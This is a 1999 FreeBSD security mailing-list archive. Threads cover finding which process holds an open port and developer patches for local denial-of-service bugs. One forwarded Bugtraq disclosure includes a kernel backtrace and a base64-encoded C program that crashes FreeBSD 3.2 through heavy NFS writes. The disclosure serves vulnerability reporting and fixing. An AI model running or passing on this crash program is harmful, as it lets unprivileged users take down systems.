owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org netstat -na and friends, see man netstat On Sat, 4 Sep 1999, N. N.M wrote: > Hi, > > 1) I realized that the TCP ports of 6010,6011,6012 and 6013 are openly > listening on my FreeBSD box. I don't know how this has happened, as they > were not open before. They are related to X11 as far as I know. But I had > already disabled XDM in /etc/ttys file. Could anybody tell me how I can > disable this stuff? Or how they could get opened and listening? > > 2) This is some time that two UDP ports have got opened as well. Again, I > don't have any idea on how they have got enabled. The ports are 1352 and > 2699. Generally, how I can trace when a port gets suddenly enabled? > > thanks very much, > Nazila N. > > ______________________________________________________ > Get Your Private, Free Email at http://www.hotmail.com > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- e-Mail: hibma@skylink.it To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 4 7:29:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from drago.cert.org.tw (drago.cert.org.tw [140.117.100.10]) by hub.freebsd.org (Postfix) with ESMTP id B0D3C15267 for ; Sat, 4 Sep 1999 07:29:05 -0700 (PDT) (envelope-from foxfair@drago.cert.org.tw) Received: from foxfair (foxfair@foxfair.cc.nsysu.edu.tw [140.117.100.101]) by drago.cert.org.tw (8.9.3/8.9.3) with SMTP id WAA60547 for ; Sat, 4 Sep 1999 22:26:28 +0800 (CST) Date: Sat, 04 Sep 1999 22:28:24 +0800 From: Foxfair Hu To: security@FreeBSD.org Subject: Fw: [ Kernel panic with FreeBSD-3.2-19990830-STABLE ] Message-Id: <37D12C8896.4BDAFOXFAIR@drago.cert.org.tw> MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="U2F0LCAwNCBTZXAgMTk5OSAyMjoyODoyNCArMDgwMA==" Content-Transfer-Encoding: 7bit X-Mailer: Becky! ver 1.25.04 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --U2F0LCAwNCBTZXAgMTk5OSAyMjoyODoyNCArMDgwMA== Content-Transfer-Encoding: 7bit Content-Type: text/plain Forwarded by Foxfair Hu ---------------- Original message follows ---------------- From: Sebastien Petit To: BUGTRAQ@SECURITYFOCUS.COM Date: Thu, 2 Sep 1999 16:53:03 +0200 Subject: [ Kernel panic with FreeBSD-3.2-19990830-STABLE ] -- Hi ! There is a problem with FreeBSD 3.2-RELEASE and -STABLE and perhaps FreeBSD 3.x. The system panics when a program does multiple access on nfs v3 mounted directory with default mount options (ie: mount x.x.x.x:/nfs /usr2). FreeBSD 3.2 crashes immediatly with no warnings and just a "panic: getnewbuf: cannot get buffer, infinite recursion failure" without root privileges. This is simple to reproduce with a program that creates a lot of process (ie: 120) accessing the nfs mounted directory and just does "open", "seek", "write", "close". NetBSD is not vulnerable. gdb: panic: getnewbuf: cannot get buffer, infinite recursion failure syncing disks... panic: getnewbuf: cannot get buffer, infinite recursion failure dumping to dev 20001, offset 272816 dump 127 126 125 124 123 122 121 120 119 118 117 116 115 114 113 112 111 110 109 108 107 106 105 104 103 102 101 100 99 98 97 96 95 94 93 92 91 90 89 88 87 86 85 84 83 82 81 80 79 78 77 76 75 74 73 72 71 70 69 68 67 66 65 64 63 62 61 60 59 58 57 56 55 54 53 52 51 50 49 48 47 46 45 44 43 42 41 40 39 38 37 36 35 34 33 32 31 30 29 28 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 --- #0 boot (howto=260) at ../../kern/kern_shutdown.c:285 285 dumppcb.pcb_cr3 = rcr3(); (kgdb) where #0 boot (howto=260) at ../../kern/kern_shutdown.c:285 #1 0xc012f87c in at_shutdown ( function=0xc02075f1 <__set_sysctl__vfs_sym_sysctl___vfs_kvafreespace+361>, arg=0x200, queue=1174437888) at ../../kern/kern_shutdown.c:446 #2 0xc014dc9f in getnewbuf (vp=0xcc1edb40, blkno=2293824, slpflag=0, slptimeo=0, size=8192, maxsize=8192) at ../../kern/vfs_bio.c:1074 #3 0xc014e58c in getblk (vp=0xcc1edb40, blkno=2293824, size=8192, slpflag=0, slptimeo=0) at ../../kern/vfs_bio.c:1511 #4 0xc014cd85 in bread (vp=0xcc1edb40, blkno=2293824, size=8192, cred=0x0, bpp=0xcc3acbec) at ../../kern/vfs_bio.c:282 #5 0xc01b60f8 in ffs_update (vp=0xcc21ea40, waitfor=0) at ../../ufs/ffs/ffs_inode.c:98 #6 0xc01ba92f in ffs_fsync (ap=0xcc3acc74) at ../../ufs/ffs/ffs_vnops.c:258 #7 0xc01b8cb7 in ffs_sync (mp=0xc1d01c00, waitfor=2, cred=0xc0756300, p=0xc0246624) at vnode_if.h:499 #8 0xc0155f37 in sync (p=0xc0246624, uap=0x0) at ../../kern/vfs_syscalls.c:549 #9 0xc012f43d in boot (howto=256) at ../../kern/kern_shutdown.c:203 #10 0xc012f87c in at_shutdown ( function=0xc02075f1 <__set_sysctl__vfs_sym_sysctl___vfs_kvafreespace+361>, arg=0x2000, queue=12443648) at ../../kern/kern_shutdown.c:446 #11 0xc014dc9f in getnewbuf (vp=0xcc243280, blkno=1519, slpflag=0, slptimeo=0, size=8192, maxsize=8192) at ../../kern/vfs_bio.c:1074 #12 0xc014e58c in getblk (vp=0xcc243280, blkno=1519, size=8192, slpflag=0, slptimeo=0) at ../../kern/vfs_bio.c:1511 #13 0xc017b9fa in nfs_getcacheblk (vp=0xcc243280, bn=1519, size=8192, p=0xcc36f700) at ../../nfs/nfs_bio.c:904 #14 0xc017b5a5 in nfs_write (ap=0xcc3acec8) at ../../nfs/nfs_bio.c:765 #15 0xc0159dea in vn_write (fp=0xc1d40d40, uio=0xcc3acf10, cred=0xc1d36300, flags=0) at vnode_if.h:331 #16 0xc013a73a in dofilewrite (p=0xcc36f700, fp=0xc1d40d40, fd=3, buf=0x804b000, nbyte=102400, offset=-1, flags=0) at ../../kern/sys_generic.c:363 #17 0xc013a643 in write (p=0xcc36f700, uap=0xcc3acf94) at ../../kern/sys_generic.c:298 #18 0xc01e6edb in syscall (frame={tf_es = 39, tf_ds = 39, tf_edi = 0, tf_esi = 12384951, tf_ebp = -1077945584, tf_isp = -868560924, tf_ebx = 12384951, tf_edx = 0, tf_ecx = 12384951, tf_eax = 4, tf_trapno = 7, tf_err = 2, tf_eip = 671700396, tf_cs = 31, tf_eflags = 582, tf_esp = -1077946192, tf_ss = 39}) at ../../i386/i386/trap.c:1100 #19 0xc01dda5c in Xint0x80_syscall () #20 0x8048799 in ?? () Exploit nfsexp.c is attached to this message. Spe & Gro. --- spe@oleane.net gro@oleane.net --U2F0LCAwNCBTZXAgMTk5OSAyMjoyODoyNCArMDgwMA== Content-Type: application/octet-stream; name="nfsbench.c" Content-Disposition: attachment; filename="nfsbench.c" Content-Transfer-Encoding: base64 I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zdGF0Lmg+DQojaW5jbHVkZSA8 c3lzL3dhaXQuaD4NCiNpbmNsdWRlIDxmY250bC5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0KI2lu Y2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHNpZ25hbC5oPg0KI2luY2x1ZGUgPHN0ZGlvLmg+ DQojaW5jbHVkZSA8c3lzL3RpbWUuaD4NCiNpbmNsdWRlIDx0aW1lLmg+DQoNCnZvaWQgdXNyMSgp IHsNCn0NCg0KaW50IG1haW4oaW50IGFyZ2MsIGNoYXIgKiogYXJndikgew0KICBpbnQgbmJmaWxz Ow0KICBpbnQgbmJvcGVuOw0KICBpbnQgdGJsb2M7DQogIGludCB0ZmljaGllcjsNCiAgY2hhciBm aWxlbmFtZVs1MTJdOw0KICBpbnQgaSwgaiwgaywgZjsNCiAgaW50IHBpZDsNCiAgc3RydWN0IHRp bWV2YWwgc3RhcnQ7DQogIHN0cnVjdCB0aW1ldmFsIGVuZDsNCiAgZmxvYXQgZGVsYXk7DQogIHZv aWQgKiBibG9jOw0KDQogIGlmIChhcmdjPDYpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwgIlN5bnRh eDogJXMgcmVwX25mcy8gbmJfY2hpbGQgbmJfb3BlbiBzaXplZmlsZShLYikgYmxvY2tzaXplKGti KS5cbiIsIGFyZ3ZbMF0pOw0KICAgIGZwcmludGYoc3RkZXJyLCAiaWU6ICVzIC9URVNULyAxMjAg MjAwIDIwMDAwIDEwMFxuIik7DQogICAgZXhpdChFWElUX0ZBSUxVUkUpOw0KICB9DQoNCiAgbmJm aWxzID0gYXRvaShhcmd2WzJdKTsNCiAgbmJvcGVuID0gYXRvaShhcmd2WzNdKTsNCiAgdGZpY2hp ZXIgPSBhdG9pKGFyZ3ZbNF0pOw0KICB0YmxvYyA9IGF0b2koYXJndls1XSk7DQoNCiAgYmxvYyA9 IG1hbGxvYyh0YmxvYyAqIDEwMjQpOw0KICBtZW1zZXQoYmxvYywgMCwgdGJsb2MgKiAxMDI0KTsN CiAgaWYgKCFibG9jKSB7DQogICAgZnByaW50ZihzdGRlcnIsICIlczogIiwgYXJndlswXSk7DQog ICAgcGVycm9yKCJtYWxsb2MiKTsNCiAgICBleGl0KC0xKTsNCiAgfQ0KDQogIGZwcmludGYoc3Rk ZXJyLCAiZm9ya2luZyAlZCB0aW1lcy4uLlxuIiwgbmJmaWxzKTsNCg0KICBzaWduYWwoU0lHVVNS MSwgJnVzcjEpOw0KDQogIGogPSAwOw0KICBmb3IoaT0wO2k8bmJmaWxzO2krKykgew0KICAgIHBp ZCA9IGZvcmsoKTsNCiAgICBpZiAocGlkPDApIHsNCiAgICAgIHBlcnJvcigiZm9yayIpOw0KICAg ICAgYnJlYWs7DQogICAgfSBlbHNlDQogICAgICBqKys7DQogICAgaWYgKCFwaWQpIGJyZWFrOw0K ICB9DQoNCg0KICBpZiAoIXBpZCkgew0KICAgIHBhdXNlKCk7DQogICAgcGlkID0gZ2V0cGlkKCk7 DQogICAgc3JhbmQocGlkKjEwKTsNCiAgICBmcHJpbnRmKHN0ZGVyciwgIlslZF0gY2hpbGQgJWQ6 IEhlcmUgSSBnbyFcbiIsIHBpZCwgaSk7DQogICAgc3ByaW50ZihmaWxlbmFtZSwgIiVzJWQiLCBh cmd2WzFdLCBwaWQpOw0KICAgIGZvcihpPTA7aTxuYm9wZW47aSsrKSB7DQogICAgICBmID0gb3Bl bihmaWxlbmFtZSwgT19DUkVBVHxPX1JEV1IsIDA2NjYpOw0KICAgICAgaWYgKGY8MCkgew0KCWZw cmludGYoc3RkZXJyLCAiWyVkXSBmaWxlICVzICIsIHBpZCwgZmlsZW5hbWUpOw0KCXBlcnJvcigi b3BlbiIpOw0KCWJyZWFrOw0KICAgICAgfQ0KICAgICAgayA9IChyYW5kKCkgJSAodGZpY2hpZXIg KiAxMDI0KSk7DQogICAgICBqID0gbHNlZWsoZiwgaywgU0VFS19TRVQpOw0KICAgICAgaWYgKGoh PWspIHsNCglmcHJpbnRmKHN0ZGVyciwgIlslZF0gIiwgcGlkKTsNCglwZXJyb3IoImxzZWVrIik7 DQoJYnJlYWs7DQogICAgICB9DQogICAgICAvLyByZWFkKGYsIGJsb2MsIHRibG9jKjEwMjQpOw0K ICAgICAgaWYgKHdyaXRlKGYsIGJsb2MsIHRibG9jKjEwMjQpIT10YmxvYyoxMDI0KSB7DQoJZnBy aW50ZihzdGRlcnIsICJbJWRdICIsIHBpZCk7DQoJcGVycm9yKCJ3cml0ZSIpOw0KCWJyZWFrOw0K ICAgICAgfQ0KICAgICAgc3luYygpOw0KICAgICAgaWYgKGNsb3NlKGYpKSB7DQoJZnByaW50Zihz dGRlcnIsICJbJWRdICIsIHBpZCk7DQoJcGVycm9yKCJjbG9zZSIpOw0KCWJyZWFrOw0KICAgICAg fQ0KICAgIH0NCiAgICBleGl0KDApOw0KICB9DQoNCiAgc2xlZXAoMik7DQogIGdldHRpbWVvZmRh eSgmc3RhcnQsIE5VTEwpOw0KICBraWxsKDAsIFNJR1VTUjEpOw0KDQogIGkgPSAwOw0KICB3aGls ZSAoaTxuYmZpbHMpDQogICAgaWYgKHdhaXRwaWQoLTEsIE5VTEwsIDApPjApDQogICAgICBpKys7 DQoNCiAgZnByaW50ZihzdGRlcnIsICJ0aGV5J3JlIGFsbCBkZWFkIG5vdywgZXhpdGluZy5cbllv dXIgc3lzdGVtIGlzIG5vdCB2dWxuZXJhYmxlXG4iKTsNCiAgZ2V0dGltZW9mZGF5KCZlbmQsIE5V TEwpOw0KICBkZWxheSA9IGVuZC50dl9zZWMgLSBzdGFydC50dl9zZWMgKyAoKGZsb2F0KSAoZW5k LnR2X3VzZWMgLSBzdGFydC50dl91c2VjKSkNCiAgICAvIChmbG9hdCkgMTAwMDAwMDsNCg0KICBp ID0gbmJvcGVuICogdGJsb2MgKiBuYmZpbHM7DQoJDQogIGV4aXQoMCk7DQp9DQoNCg== --U2F0LCAwNCBTZXAgMTk5OSAyMjoyODoyNCArMDgwMA==-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 4 8:19:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from sonet.crimea.ua (OTC-sl3-FLY.CRIS.NET [212.110.136.71]) by hub.freebsd.org (Postfix) with ESMTP id 483AC14EF1 for ; Sat, 4 Sep 1999 08:19:01 -0700 (PDT) (envelope-from phantom@scorpion.crimea.ua) Received: (from uucp@localhost) by sonet.crimea.ua (8.8.8/8.8.8) with UUCP id QAA20796; Sat, 4 Sep 1999 16:56:03 +0400 (MSD) (envelope-from phantom@scorpion.crimea.ua) Received: (from phantom@localhost) by scorpion.crimea.ua (8.8.8/8.8.5+ssl+keepalive) id PAA02815; Sat, 4 Sep 1999 15:00:06 +0400 (MSD) Date: Sat, 4 Sep 1999 15:00:06 +0400 From: Alexey Zelkin To: "N. N.M" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Tracing open ports on FreeBSD Message-ID: <19990904150006.A2526@scorpion.crimea.ua> References: <19990904112855.43007.qmail@hotmail.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.7i In-Reply-To: <19990904112855.43007.qmail@hotmail.com> X-Operating-System: FreeBSD 2.2.7-RELEASE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hi, On Sat, Sep 04, 1999 at 04:28:53AM -0700, N. N.M wrote: > 1) I realized that the TCP ports of 6010,6011,6012 and 6013 are openly > listening on my FreeBSD box. I don't know how this has happened, as they > were not open before. They are related to X11 as far as I know. But I had > already disabled XDM in /etc/ttys file. Could anybody tell me how I can > disable this stuff? Or how they could get opened and listening? > > 2) This is some time that two UDP ports have got opened as well. Again, I > don't have any idea on how they have got enabled. The ports are 1352 and > 2699. Generally, how I can trace when a port gets suddenly enabled? I can propose idea how to understand which process used this port. for example -- how to find process which opened port 80 (aka http) $ netstat -Ana | grep \*\.80 f0625d00 tcp 0 0 *.80 *.* LISTEN $ fstat | grep f00625d00 nobody httpd 200 15* internet stream tcp f00625d00 first field is process owner second - name of process third - pid -- /* Alexey Zelkin && phantom@cris.net */ /* Tavrical National University && phantom@crimea.edu */ /* http://www.ccssu.crimea.ua/~phantom && phantom@FreeBSD.org */ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 4 10: 2:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from trooper.velocet.ca (trooper.velocet.net [216.126.82.226]) by hub.freebsd.org (Postfix) with ESMTP id D50FD15135 for ; Sat, 4 Sep 1999 10:02:17 -0700 (PDT) (envelope-from dgilbert@trooper.velocet.ca) Received: (from dgilbert@localhost) by trooper.velocet.ca (8.9.3/8.9.3) id NAA45902; Sat, 4 Sep 1999 13:02:11 -0400 (EDT) (envelope-from dgilbert) From: David Gilbert MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14289.20627.316196.336184@trooper.velocet.ca> Date: Sat, 4 Sep 1999 13:02:11 -0400 (EDT) To: "N. N.M" Cc: freebsd-security@FreeBSD.ORG Subject: Tracing open ports on FreeBSD In-Reply-To: <19990904112855.43007.qmail@hotmail.com> References: <19990904112855.43007.qmail@hotmail.com> X-Mailer: VM 6.71 under 20.4 "Emerald" XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >>>>> "N" == N N M writes: N> Hi, 1) I realized that the TCP ports of 6010,6011,6012 and 6013 are N> openly listening on my FreeBSD box. I don't know how this has N> happened, as they were not open before. They are related to X11 as N> far as I know. But I had already disabled XDM in /etc/ttys N> file. Could anybody tell me how I can disable this stuff? Or how N> they could get opened and listening? Generally, these are ssh. When you ssh into a machine and have X forwarding on, these ports are open --- one port for each ssh connection. N> 2) This is some time that two UDP ports have got opened as N> well. Again, I don't have any idea on how they have got N> enabled. The ports are 1352 and 2699. Generally, how I can trace N> when a port gets suddenly enabled? try lsof -i:1352 .... Dave. -- ============================================================================ |David Gilbert, Velocet Communications. | Two things can only be | |Mail: dgilbert@velocet.net | equal if and only if they | |http://www.velocet.net/~dgilbert | are precisely opposite. | =========================================================GLO================ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 4 13: 1:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.palmerharvey.co.uk (mail.palmerharvey.co.uk [62.172.109.58]) by hub.freebsd.org (Postfix) with ESMTP id 17B6514EED for ; Sat, 4 Sep 1999 13:01:39 -0700 (PDT) (envelope-from Dom.Mitchell@palmerharvey.co.uk) Received: from ho-nt-01.pandhm.co.uk (unverified) by mail.palmerharvey.co.uk (Content Technologies SMTPRS 4.0.1) with ESMTP id ; Sat, 4 Sep 1999 20:59:38 +0100 Received: from voodoo.pandhm.co.uk (VOODOO [10.100.35.12]) by ho-nt-01.pandhm.co.uk with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2448.0) id RWF23YZQ; Sat, 4 Sep 1999 20:59:07 +0100 Received: from dom by voodoo.pandhm.co.uk with local (Exim 2.10 #1) id 11NLyp-000JBR-00; Sat, 4 Sep 1999 21:00:07 +0100 Date: Sat, 4 Sep 1999 21:00:07 +0100 To: Alexey Zelkin Cc: "N. N.M" , freebsd-security@FreeBSD.ORG Subject: Re: Tracing open ports on FreeBSD Message-ID: <19990904210006.A73676@voodoo.pandhm.co.uk> References: <19990904112855.43007.qmail@hotmail.com> <19990904150006.A2526@scorpion.crimea.ua> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.6i In-Reply-To: <19990904150006.A2526@scorpion.crimea.ua>; from Alexey Zelkin on Sat, Sep 04, 1999 at 03:00:06PM +0400 From: Dominic Mitchell Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Sep 04, 1999 at 03:00:06PM +0400, Alexey Zelkin wrote: > On Sat, Sep 04, 1999 at 04:28:53AM -0700, N. N.M wrote: > > > 1) I realized that the TCP ports of 6010,6011,6012 and 6013 are openly > > listening on my FreeBSD box. I don't know how this has happened, as they > > were not open before. They are related to X11 as far as I know. But I had > > already disabled XDM in /etc/ttys file. Could anybody tell me how I can > > disable this stuff? Or how they could get opened and listening? Most likely an ssh connection... ssh has numbered X servers. > > 2) This is some time that two UDP ports have got opened as well. Again, I > > don't have any idea on how they have got enabled. The ports are 1352 and > > 2699. Generally, how I can trace when a port gets suddenly enabled? > > I can propose idea how to understand which process used this port. > > for example -- how to find process which opened port 80 (aka http) If you're running a fairly recent FreeBSD (it was in 3.2), the sockstat utility will do this for you. -- Dom Mitchell -- Palmer & Harvey McLane -- Unix Systems Administrator "Ordinary folks who don't understand computers don't deserve to be mocked. Ordinary people who want to use their computers but refuse to learn anything about them do." -- slashdot comment ********************************************************************** This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This footnote also confirms that this email message has been swept by MIMEsweeper for the presence of computer viruses. www.mimesweeper.com ********************************************************************** To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 4 16:55: 3 1999 Delivered-To: freebsd-security@freebsd.org Received: from janus.syracuse.net (janus.syracuse.net [205.232.47.15]) by hub.freebsd.org (Postfix) with ESMTP id F1F4515232 for ; Sat, 4 Sep 1999 16:55:01 -0700 (PDT) (envelope-from green@FreeBSD.org) Received: from localhost (green@localhost) by janus.syracuse.net (8.9.3/8.8.7) with ESMTP id TAA77857 for ; Sat, 4 Sep 1999 19:54:54 -0400 (EDT) X-Authentication-Warning: janus.syracuse.net: green owned process doing -bs Date: Sat, 4 Sep 1999 19:54:54 -0400 (EDT) From: "Brian F. Feldman" X-Sender: green@janus.syracuse.net To: security@FreeBSD.org Subject: another local DoS fix (PR ???) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I can't find the PR for it again (it was from will@iki.fi, supposedly) for the problem, but this is something I have been working on crashopen.c and crashwrite.c had the ability to DoS a system easily. I fixed crashopen.c with the addition of badfileops. Crashwrite.c and other problems that could crop up like it are fixed by my patch up at http://www.FreeBSD.org/~green/fdfix2.patch Let me know how useful you find them. I'd like to get my diffs in 4.0 soon, since I've been running with them with no problems for months, and they make FreeBSD more robust. Let me know what you think, even if you don't try them, please :) -- Brian Fundakowski Feldman / "Any sufficiently advanced bug is \ green@FreeBSD.org | indistinguishable from a feature." | FreeBSD: The Power to Serve! \ -- Rich Kulawiec / To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 4 17: 8:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from janus.syracuse.net (janus.syracuse.net [205.232.47.15]) by hub.freebsd.org (Postfix) with ESMTP id 0944414DFF for ; Sat, 4 Sep 1999 17:08:23 -0700 (PDT) (envelope-from green@FreeBSD.org) Received: from localhost (green@localhost) by janus.syracuse.net (8.9.3/8.8.7) with ESMTP id UAA78039; Sat, 4 Sep 1999 20:07:17 -0400 (EDT) X-Authentication-Warning: janus.syracuse.net: green owned process doing -bs Date: Sat, 4 Sep 1999 20:07:17 -0400 (EDT) From: "Brian F. Feldman" X-Sender: green@janus.syracuse.net To: Mike Tancsa Cc: Garrett Wollman , freebsd-security@FreeBSD.org Subject: Re: FW: Local DoS in FreeBSD In-Reply-To: <4.1.19990901191051.04e80570@granite.sentex.ca> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 1 Sep 1999, Mike Tancsa wrote: > >We have known for some time that the problem originally described > >exists, but developing an acceptable solution has been a challenge. > >Now that sockets carry around user credentials, it may perhaps not be > >as difficult as it used to be. > > > >What needs to be done is to impose a per-UID resource limit on the > >amount of socket buffer space available. > > > Do you think these changes would be incorporated into the 3.x branch, or > strictly 4.x ? Both. The basis necessary (so_cred) is in both, but I need to change it to a ucred (it really should be a ucred, not a pcred.) That change is one of the changes I've made in my diffs I posted an address to. > > ---Mike > ********************************************************************** > Mike Tancsa, Network Admin * mike@sentex.net > Sentex Communications Corp, * http://www.sentex.net/mike > Cambridge, Ontario * 01.519.651.3400 > Canada * > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- Brian Fundakowski Feldman / "Any sufficiently advanced bug is \ green@FreeBSD.org | indistinguishable from a feature." | FreeBSD: The Power to Serve! \ -- Rich Kulawiec / To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 4 17:10: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from janus.syracuse.net (janus.syracuse.net [205.232.47.15]) by hub.freebsd.org (Postfix) with ESMTP id 12C1E14DFF for ; Sat, 4 Sep 1999 17:10:02 -0700 (PDT) (envelope-from green@FreeBSD.org) Received: from localhost (green@localhost) by janus.syracuse.net (8.9.3/8.8.7) with ESMTP id UAA78019; Sat, 4 Sep 1999 20:05:28 -0400 (EDT) X-Authentication-Warning: janus.syracuse.net: green owned process doing -bs Date: Sat, 4 Sep 1999 20:05:27 -0400 (EDT) From: "Brian F. Feldman" X-Sender: green@janus.syracuse.net To: Garrett Wollman Cc: Nick Hibma , FreeBSD -- The Power to Serve , Mike Tancsa , freebsd-security@FreeBSD.org Subject: Re: FW: Local DoS in FreeBSD In-Reply-To: <199909012046.QAA07324@khavrinen.lcs.mit.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 1 Sep 1999, Garrett Wollman wrote: > < said: > > > One of the features I like about Unix is for example free space > > available solely to the root user. It could be imagined that these > > things also apply to file handles, memory/swap space and other scarce > > resources. > > We have known for some time that the problem originally described > exists, but developing an acceptable solution has been a challenge. > Now that sockets carry around user credentials, it may perhaps not be > as difficult as it used to be. > > What needs to be done is to impose a per-UID resource limit on the > amount of socket buffer space available. That's what peter and I came up with at least :) > > What's not clear is: > > 1) At what level do you impose this limit? Resource limit, definitely. > > 2) Should the limit be statistical or exact? Well, I have it exact it would seem. > > 3) What is a sensible default value? Whatever's in login.conf? :) Would you mind helping me out with http://www.FreeBSD.org/~green/sbsize2.patch? The KASSERT() fails in some cases, which I need help tracking down. > > -GAWollman > > -- > Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same > wollman@lcs.mit.edu | O Siem / The fires of freedom > Opinions not those of| Dance in the burning flame > MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- Brian Fundakowski Feldman / "Any sufficiently advanced bug is \ green@FreeBSD.org | indistinguishable from a feature." | FreeBSD: The Power to Serve! \ -- Rich Kulawiec / To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 4 17:49:16 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 0EAB91562D; Sat, 4 Sep 1999 17:49:09 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id RAA63733; Sat, 4 Sep 1999 17:48:41 -0700 (PDT) (envelope-from dillon) Date: Sat, 4 Sep 1999 17:48:41 -0700 (PDT) From: Matthew Dillon Message-Id: <199909050048.RAA63733@apollo.backplane.com> To: "Brian F. Feldman" Cc: security@FreeBSD.ORG Subject: Re: another local DoS fix (PR ???) References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :I can't find the PR for it again (it was from will@iki.fi, supposedly) :for the problem, but this is something I have been working on : :crashopen.c and crashwrite.c had the ability to DoS a system easily. :I fixed crashopen.c with the addition of badfileops. Crashwrite.c and :other problems that could crop up like it are fixed by my patch up at : : http://www.FreeBSD.org/~green/fdfix2.patch : :Let me know how useful you find them. I'd like to get my diffs in :4.0 soon, since I've been running with them with no problems for :months, and they make FreeBSD more robust. Let me know what you :think, even if you don't try them, please :) : :-- : Brian Fundakowski Feldman / "Any sufficiently advanced bug is \ I haven't run this patch, but I took a gander at it and it looks quite reasonable to me. There is one area of concern, not so much with the patch itself but the weakness that it reveals in the existing code. Most of the places you patch run the fo_*() op on the fp and then return, not using the fp again. Some, however, use the fp after the fo_*() function returns. I only see one place where this occurs, F_SETFL in kern/kern_descrip.c, and it's a degenerate case since the fcntl's in question typically do not block. - The proper way to deal with the fp stuff would probably be to make the getfp*() inline global and have it bump the ref count, then require the fp to be released. But this would require a considerable amount of rewriting to cleanup all the code so it may not be worth doing. kern/sys_generic.c has a static getfp() which takes an extra 'flags' argument while the rest of the kernel obtains the fp manually and typically without a test against flags. Rewriting the mess would also require all the 'return ( ... fo_* .... )' code in the switch statements to be converted to error = ... fo_* ... so the fp can be released in the outer code. If you did things this way you would then not bother writing inlines for the fo_*() functions but would instead keep the original function dispatch code. -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 4 18:11:11 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id EBCFB15051; Sat, 4 Sep 1999 18:11:08 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id SAA63819; Sat, 4 Sep 1999 18:10:13 -0700 (PDT) (envelope-from dillon) Date: Sat, 4 Sep 1999 18:10:13 -0700 (PDT) From: Matthew Dillon Message-Id: <199909050110.SAA63819@apollo.backplane.com> To: "Brian F. Feldman" Cc: Garrett Wollman , Nick Hibma , FreeBSD -- The Power to Serve , Mike Tancsa , freebsd-security@FreeBSD.ORG Subject: Re: FW: Local DoS in FreeBSD References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org : :Whatever's in login.conf? :) Would you mind helping me out with :http://www.FreeBSD.org/~green/sbsize2.patch? The KASSERT() fails :in some cases, which I need help tracking down. :... : Brian Fundakowski Feldman / 